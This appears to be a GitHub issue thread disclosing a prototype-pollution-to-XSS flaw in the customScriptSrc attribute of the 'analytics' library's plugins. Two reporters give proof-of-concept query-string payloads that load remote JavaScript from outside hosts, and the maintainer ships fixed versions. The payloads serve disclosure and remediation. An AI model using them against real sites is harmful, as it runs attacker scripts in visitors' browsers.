Prototype pollution of customScriptSrc leads to XSS

[alexdaviestray]

Description

Multiple plugins appear to be susceptible to prototype pollution leading to cross-site scripting via the customScriptSrc attribute. Potentially impacted plugins include Amplitude, GoogleAnalytics, GoogleTagManager, Hubspot, Mixpanel, Segment and maybe others.

A remote attacker could abuse this vulnerability to trick users into executing arbitrary Javascript on a site running the analytics plugin Javascript.

Reproduction

1. Deploy a copy of the HTML example from here - https://github.com/DavidWells/analytics/tree/master/packages/analytics-plugin-mixpanel
2. Visit the following URL replacing the hostname with your server - http://myserver/index.html?__proto__[customScriptSrc]=//poc-js.s3.amazonaws.com/alert.js
3. The remote Javascript should load and an alert box will be shown demonstrating how a cross-site scripting attack is possible.

Remediation

I don't know the codebase well enough to suggest a solution however there are some pretty good suggestions for remediation here - https://stackoverflow.com/questions/57780961/how-to-prevent-prototype-pollution-in-javascript

[kingkool68]

http://myserver/index.html/?constructor[prototype][customScriptSrc]=//spqr.zz.mu/xss.js is another variation of this same attack

[DavidWells]

Good find!

Making some updates now like #196

[DavidWells]

Fixed & released via

• analytics@0.7.14
• analytics-utils@1.0.3